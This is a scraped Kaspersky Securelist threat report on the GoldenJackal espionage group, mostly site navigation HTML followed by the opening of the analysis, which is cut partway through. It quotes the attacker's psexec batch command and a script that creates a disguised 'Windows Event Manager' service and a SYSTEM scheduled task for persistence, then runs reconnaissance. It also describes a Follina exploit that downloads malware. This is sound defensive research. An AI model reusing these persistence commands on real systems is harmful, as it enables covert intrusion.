menu-item-type-custom menu-item-object-custom menu-item-87746"><figure><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-intelligence.png"</a></figure><a 
href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Threat Intelligence</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-incident-response menu-item menu-item-type-custom menu-item-object-custom menu-item-87748"><figure><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/incident-response.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Managed Detection and Response</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-hunting menu-item menu-item-type-custom menu-item-object-custom menu-item-87747"><figure><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-hunting.png"</a></figure><a 
href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>Compromise Assessment</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/compromise-assessment?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-threat-hunting menu-item menu-item-type-custom menu-item-object-custom menu-item-112333"><figure><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/threat-hunting.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><span class="surtitle">Kaspersky</span>SOC Consulting</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/soc-consulting?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other Services</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87751"><a href="https://www.kaspersky.com/enterprise-security/professional-services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Professional Services</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87752"><a 
href="https://www.kaspersky.com/enterprise-security/incident-response?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Incident Response</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87753"><a href="https://www.kaspersky.com/enterprise-security/cyber-security-training?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Cybersecurity Training</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87755"><a href="https://www.kaspersky.com/enterprise-security/services?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">View All</a> </ul> </ul> <li class="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87756"><a href="https://www.kaspersky.com/enterprise-security/resources?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Resource Center</a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87757"><a href="https://www.kaspersky.com/enterprise-security/resources/case-studies?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Case Studies</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87758"><a href="https://www.kaspersky.com/enterprise-security/resources/white-papers?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">White Papers</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87759"><a 
href="https://www.kaspersky.com/enterprise-security/resources/data-sheets?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Datasheets</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87760"><a href="https://www.kaspersky.com/enterprise-security/wiki-section/home?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Technologies</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105620"><a href="https://www.kaspersky.com/MITRE?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">MITRE ATT&CK</a> </ul> <li class="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87761"><a href="https://www.kaspersky.com/about?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">About Us</a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105621"><a href="https://www.kaspersky.com/about/transparency?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Transparency</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105622"><a href="https://www.kaspersky.com/about/press-releases?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Corporate News</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105623"><a href="https://press.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Press Center</a> <li 
class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105624"><a href="https://www.kaspersky.com/about/careers?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Careers</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105626"><a href="https://www.kaspersky.com/about/sponsorships/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Sponsorship</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105627"><a href="https://www.kaspersky.com/about/policy-blog?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Policy Blog</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105628"><a href="https://www.kaspersky.com/about/contact?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Contacts</a> </ul> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87762"><a href="https://www.kaspersky.com/gdpr?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">GDPR</a> </ul> </nav> </div> </header> <div class="mobile-menu-wrapper mobile-menu-wrapper--dark"> <ul class="mobile-nav" data-back="Back"> <li class="selector"> <a data-element-id="subscribe-button" href="#modal-newsletter" class="button-link js-modal-open"><i class="font-icons icon-envelope"></i>Subscribe</a> <a href="#" class="button-link c-theme-switcher js-theme-switcher"><i class="font-icons icon-moon"></i> Dark mode<span class="u-hidden u-inline--dark"> off</span></a> <a data-element-id="login-button" href="#" class="button-link js-kaspersky-sso-login"><svg class="o-icon o-svg-icon"><use 
xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-user"></use></svg>Login</a> </li> <li class="title"> <span>Securelist menu</span> </li> <li class="parent" data-parent data-icon="top-item"><a data-element-id="lang-selector" href="#" class=""><i class="top-item"></i><span>English</span></a><ul class="submenu"><li class="menu-item"><a href="https://securelist.ru">Russian</a></li><li class="menu-item"><a href="https://securelist.lat">Spanish</a></li></ul> <li class="parent" data-parent="Existing Customers" data-icon="font-icons top-item"><a rel="Existing Customers" href="#"><i class="font-icons top-item"></i><span>Existing Customers</span></a> <ul class="submenu"> <li class="parent" data-parent="Personal" data-icon="top-item"><a rel="Personal" href="#"><i class="top-item"></i><span>Personal</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87860"><a href="https://my.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">My Kaspersky</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105987"><a href="https://www.kaspersky.com/renewal-center/home?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Renew your product</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105988"><a href="https://www.kaspersky.com/downloads?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Update your product</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105989"><a href="https://support.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Customer support</a> </ul> <li class="parent" data-parent="Business" data-icon="top-item"><a rel="Business" href="#"><i 
class="top-item"></i><span>Business</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105991"><a href="https://ksos.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">KSOS portal</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105992"><a href="https://cloud.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Kaspersky Business Hub</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105993"><a href="https://support.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Technical Support</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105994"><a href="https://www.kaspersky.com/small-to-medium-business-security/resources?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Knowledge Base</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105995"><a href="https://www.kaspersky.com/renewal-center/vsb?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Renew License</a> </ul> </ul> <li class="parent" data-parent="Home" data-icon="font-icons top-item"><a rel="Home" href="#"><i class="font-icons top-item"></i><span>Home</span></a> <ul class="submenu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87778"><a href="https://www.kaspersky.com/home-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Products</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87771"><a href="https://www.kaspersky.com/downloads?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_mobmen_sm-team_______03880766cb97f3a8">Trials&Update</a> <li class="menu-item 
class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101956"><a href="https://securelist.com/webinars/" data-element-id="content-menu-link">Webinars</a></li> <li id="menu-item-101126" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-101126"><a target="_blank" rel="noopener noreferrer" href="https://apt.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">APT Logbook</a></li> <li id="menu-item-241" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-241"><a target="_blank" rel="noopener noreferrer" href="https://statistics.securelist.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">Statistics</a></li> <li id="menu-item-86643" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-86643"><a target="_blank" rel="noopener noreferrer" href="https://encyclopedia.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">Encyclopedia</a></li> <li id="menu-item-58141" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-58141"><a target="_blank" rel="noopener noreferrer" href="https://threats.kaspersky.com/?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="content-menu-link">Threats descriptions</a></li> <li id="menu-item-115044" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-115044"><a href="https://securelist.com/ksb-2024/" data-element-id="content-menu-link">KSB 2024</a></li> </ul> </li> </div> </div> </div> </div> </div> </div> </nav> </section> <section class="c-block c-block--spacing-t@md c-block--spacing-b-small@md c-block--divider-internal" style="z-index:10"> <div class="o-container-fluid"> <article 
class="c-article"> <header class="c-article__header"> <figure class="c-article__figure u-hidden@md"> <img width="800" height="450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200-800x450.jpg" class="attachment-securelist-2020-thumbnail size-securelist-2020-thumbnail wp-post-image" alt="" decoding="async" fetchpriority="high" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200-800x450.jpg" data-srcset="" srcset="" /> </figure> <p class="c-article__headline u-hidden@md"> <a href="https://securelist.com/category/apt-reports/" class="c-tag c-tag--primary">APT reports</a> </p> <h1 class="c-article__title">Meet the GoldenJackal APT group. Don’t expect any howls</h1> <div class="c-article__info"> <p class="c-article__headline u-hidden u-block@md"> <a href="https://securelist.com/category/apt-reports/" class="c-tag c-tag--primary">APT reports</a> </p> <p class="u-uppercase"><time datetime="2023-05-23T08:00:02+00:00">23 May 2023</time></p> <p class="c-article__reading u-ml-auto@md"> <svg class="o-icon o-svg-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-hourglass"></use></svg> <span class="js-reading-time"></span> minute read </p> </div> </header> <div class="c-article__wrapper"> <div class="c-article__main"> <div class="c-highlight c-highlight--overflow-down@md js-accordion u-hidden@md"> <div class="c-accordion-toggle js-accordion-toggle"> <div class="c-highlight__header"> <div class="c-highlight__icon"> <div class="u-block--theme-light u-hidden--theme-dark"> <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories.svg" /> </div> <div class="u-block--theme-dark u-hidden--theme-light"> <img 
src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories--invert.svg" /> </div> </div> <div class="c-highlight__title"> <p>Table of Contents</p> </div> </div> </div> <div class="js-accordion-container"> <div class="c-highlight__body"> <ul class='c-list-links'><li><a href="#infection-vectors">Infection vectors</a></li><li><a href="#jackalcontrol">JackalControl</a></li><ul class='c-list-links'><li><a href="#installer-mode">Installer mode</a></li><ul class='c-list-links'><li><a href="#persistence">Persistence</a></li></ul></ul><li><a href="#jackalsteal">JackalSteal</a></li><li><a href="#jackalworm">JackalWorm</a></li><li><a href="#jackalperinfo">JackalPerInfo</a></li><li><a href="#jackalscreenwatcher">JackalScreenWatcher</a></li><li><a href="#infrastructure">Infrastructure</a></li><li><a href="#victims">Victims</a></li><li><a href="#attribution">Attribution</a></li><li><a href="#conclusions">Conclusions</a></li><li><a href="#indicators-of-compromise">Indicators of compromise</a></li><ul class='c-list-links'><li><a href="#md5-hashes">MD5 hashes</a></li><li><a href="#legitimate-compromised-websites">Legitimate compromised websites</a></li></ul> </div> </div> </div> <div class="o-row c-article__container"> <div class="o-col c-article__content js-article-body"> <div class="js-reading-wrapper"> <figure class="c-article__figure u-hidden u-block@md"> <img width="1200" height="600" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200-1200x600.jpg" class="attachment-securelist-2020-thumbnail-large size-securelist-2020-thumbnail-large wp-post-image" alt="" decoding="async" loading="lazy" data-src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200-1200x600.jpg" data-srcset="" srcset="" /> </figure> <div class="c-article__authors u-hidden u-block@md"> <p class="c-block__title">Authors</p> <ul 
class="c-list-authors"> <li> <a href="https://securelist.com/author/giampaolodedola/" > <img alt='' src='https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/03/21153414/Giampaolo_Dedola_Securelist_2023-30x30.jpg' srcset='https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/03/21153414/Giampaolo_Dedola_Securelist_2023-60x60.jpg 2x' class='avatar avatar-30 photo' height='30' width='30' loading='lazy' decoding='async'/> <span>Giampaolo Dedola</span></a> </li> </ul> </div> <div class="js-reading-content"> <div class="c-wysiwyg"> <p>GoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the Middle East and South Asia. Despite the fact that they began their activities years ago, this group is generally unknown and, as far as we know, has not been publicly described.</p> <p>We started monitoring the group in mid-2020 and have observed a constant level of activity that indicates a capable and stealthy actor. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher intended to:</p> <ul> <li>control victim machines</li> <li>spread across systems using removable drives</li> <li>exfiltrate certain files from the infected system</li> <li>steal credentials</li> <li>collect information about the local system</li> <li>collect information about users’ web activities</li> <li>take screen captures of the desktop</li> </ul> <p>Based on their toolset and the attacker’s behaviour, we believe the actor’s primary motivation is espionage.</p> <h2 id="infection-vectors">Infection vectors</h2> <p>We have limited visibility on their infection vectors, but during our investigations, we observed the usage of fake Skype installers and malicious Word documents.</p> <p>The fake Skype installer was a .NET executable file named skype32.exe that was approximately 400 MB in size. 
It was a dropper containing two resources: the JackalControl Trojan and a legitimate Skype for Business standalone installer. This tool was used in 2020.
It’s worth noting that the first description of the Follina vulnerability was published on May 29, 2022 and this document appears to have been modified on June 1, two days after publication, and was first detected on June 2.</p> <p>The document was configured to load an external object from a legitimate and compromised website:</p> <p style="text-align: center">hxxps://www.pak-developers[.]net/internal_data/templates/template.html!</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214843/GoldenJackal_APT_02.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109709" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214843/GoldenJackal_APT_02.png" alt="Code snippet used to load the remote resource" width="841" height="132" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214843/GoldenJackal_APT_02.png 841w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214843/GoldenJackal_APT_02-300x47.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214843/GoldenJackal_APT_02-768x121.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214843/GoldenJackal_APT_02-370x58.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214843/GoldenJackal_APT_02-800x126.png 800w" sizes="auto, (max-width: 841px) 100vw, 841px" /></a></p> <p style="text-align: center"><strong><em>Code snippet used to load the remote resource</em></strong></p> <p>The remote webpage is a modified version of a public “<em>Proof of Concept</em>” to exploit the Follina vulnerability. The original PoC <a href="https://github.com/thalysonsousa/follina/blob/main/teste.html" target="_blank" rel="noopener">is available on GitHub</a>. 
The attacker replaced the IT_BrowseForFile variable value with the following:</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214917/GoldenJackal_APT_03.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109710" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214917/GoldenJackal_APT_03.png" alt="Code snippet used to exploit the Follina vulnerability" width="900" height="164" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214917/GoldenJackal_APT_03.png 900w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214917/GoldenJackal_APT_03-300x55.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214917/GoldenJackal_APT_03-768x140.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214917/GoldenJackal_APT_03-370x67.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214917/GoldenJackal_APT_03-800x146.png 800w" sizes="auto, (max-width: 900px) 100vw, 900px" /></a></p> <p style="text-align: center"><strong><em>Code snippet used to exploit the Follina vulnerability</em></strong></p> <p>The decoded string is:</p> <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214956/GoldenJackal_APT_04.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-109711" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214956/GoldenJackal_APT_04.png" alt="Decoded script" width="827" height="50" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214956/GoldenJackal_APT_04.png 827w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214956/GoldenJackal_APT_04-300x18.png 300w, 
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214956/GoldenJackal_APT_04-768x46.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214956/GoldenJackal_APT_04-370x22.png 370w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/16214956/GoldenJackal_APT_04-800x48.png 800w" sizes="auto, (max-width: 827px) 100vw, 827px" /></a></p> <p style="text-align: center"><em><strong>Decoded script</strong></em></p> <p>The exploit downloads and executes an executable file hosted on the legitimate compromised website, and stores it in the following path: “%Temp%\GoogleUpdateSetup.exe”. The downloaded file is the JackalControl malware.</p> <p>In other cases, we do not have a real infection vector, but we observed a system compromised during lateral movements. Specifically, we observed the attacker using the psexec utility to start a malicious batch script.</p> <div id="crayon-67b40d9467982004885594" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div 
class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> cmd /c "c:\windows\temp\install.bat > c:\windows\temp\output.txt"</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467982004885594-1">1</div></div> </td> <td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-67b40d9467982004885594-1"><span class="crayon-i">cmd</span><span class="crayon-h"> </span>/<span class="crayon-i">c</span><span class="crayon-h"> </span><span class="crayon-s">"c:\windows\temp\install.bat > c:\windows\temp\output.txt"</span></div></div></td> </tr> </table> </div> </div><p> The batch script performs a variety of actions, such as installing Microsoft .Net Framework 4, infecting the system with the JackalControl Trojan, and collecting information about the system.</p> <div id="crayon-67b40d9467989845621930" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover" style=" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;"> <div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><span class="crayon-title"></span> <div 
class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div> <div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div> <div class="crayon-plain-wrap"><textarea wrap="soft" class="crayon-plain print-no" data-settings="dblclick" readonly style="-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;"> $temp\\dnf4.exe /q /norestart tasklist sc qc "WEvMngS" sc stop "WEvMngS" sc delete "WEvMngS" sc create "WEvMngS" binpath= "\"$windir\WEvMngS.exe\" /1" displayname= "Windows Event Manager" type= own start= auto" sc description "WEvMngS" "Provides event-related methods that register routed events." 
sc start "WEvMngS" schtasks /delete /f /tn "\Microsoft\Windows\Diagnosis\Event Manager" schtasks /create /f /tn "\Microsoft\Windows\Diagnosis\Event Manager" /xml "$temp\\sch.xml" /ru "NT AUTHORITY\SYSTEM" sc qc "WEvMngS" schtasks /query /v /fo list /tn "\Microsoft\Windows\Diagnosis\Event Manager" tasklist netstat -aon ping -n 1 google.com ipconfig /displaydns netsh winhttp show proxy reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v</textarea></div> <div class="crayon-main" style=""> <table class="crayon-table"> <tr class="crayon-row"> <td class="crayon-nums " data-settings="hide"> <div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-67b40d9467989845621930-1">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-2">2</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-3">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-4">4</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-5">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-6">6</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-7">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-8">8</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-9">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-10">10</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-11">11</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-12">12</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-13">13</div><div class="crayon-num crayon-striped-num" data-line="crayon-67b40d9467989845621930-14">14</div><div class="crayon-num" data-line="crayon-67b40d9467989845621930-15">15</div><div 
